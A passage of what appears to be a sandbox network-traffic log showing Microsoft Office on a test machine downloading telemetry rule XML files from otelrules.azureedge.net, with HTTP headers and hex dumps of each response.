                                                                                                      2024-10-08 18:51:37 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      101192.168.2.74981313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:37 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:37 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1403
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                      x-ms-request-id: 87e26173-201e-0051-15e7-167340000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185137Z-1657d5bbd48dfrdj7px744zp8s000000050000000001380c
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      102192.168.2.74981413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:37 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:37 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1366
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                      x-ms-request-id: fcca05a5-501e-00a0-3202-179d9f000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185137Z-1657d5bbd48tqvfc1ysmtbdrg0000000054g00000000yb3v
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      103192.168.2.74981613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:37 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:37 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1360
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                      x-ms-request-id: fbb49b00-e01e-00aa-4806-17ceda000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185137Z-1657d5bbd48t66tjar5xuq22r8000000057g000000011ny5
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      104192.168.2.74981513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:37 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:37 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1397
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                      x-ms-request-id: c59f4b8a-601e-0084-219f-196b3f000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185137Z-1657d5bbd48762wn1qw4s5sd3000000005a000000000644u
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      105192.168.2.74981713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:37 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:37 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:37 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1427
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                      x-ms-request-id: 08bf7a15-f01e-0020-7706-17956b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185137Z-1657d5bbd48jwrqbupe3ktsx9w00000005pg000000002tkq
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:37 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      106192.168.2.74981813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:38 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:38 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:38 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1390
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                      x-ms-request-id: 7d21ea5d-701e-0098-0502-17395f000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185138Z-1657d5bbd48gqrfwecymhhbfm8000000049g000000002scf
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:38 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      107192.168.2.74982213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:38 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:38 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:38 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1391
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                      x-ms-request-id: a18d9b1d-601e-0002-1f03-17a786000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185138Z-1657d5bbd48dfrdj7px744zp8s0000000500000000013833
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:38 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      108192.168.2.74982013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:38 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:38 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:38 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1401
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                      x-ms-request-id: b6fa471e-401e-0067-43e5-1609c2000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185138Z-1657d5bbd48xlwdx82gahegw4000000005kg00000000g972
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:38 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      109192.168.2.74982113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:38 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:38 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:38 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1364
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                      x-ms-request-id: 77012b0e-b01e-0097-0bff-164f33000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185138Z-1657d5bbd48t66tjar5xuq22r8000000059000000000vwcf
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:38 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      110192.168.2.74982313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:38 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:38 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:38 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1354
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                      x-ms-request-id: d4fd285a-d01e-005a-06ed-167fd9000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185138Z-1657d5bbd48sqtlf1huhzuwq70000000055000000000b9mw
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
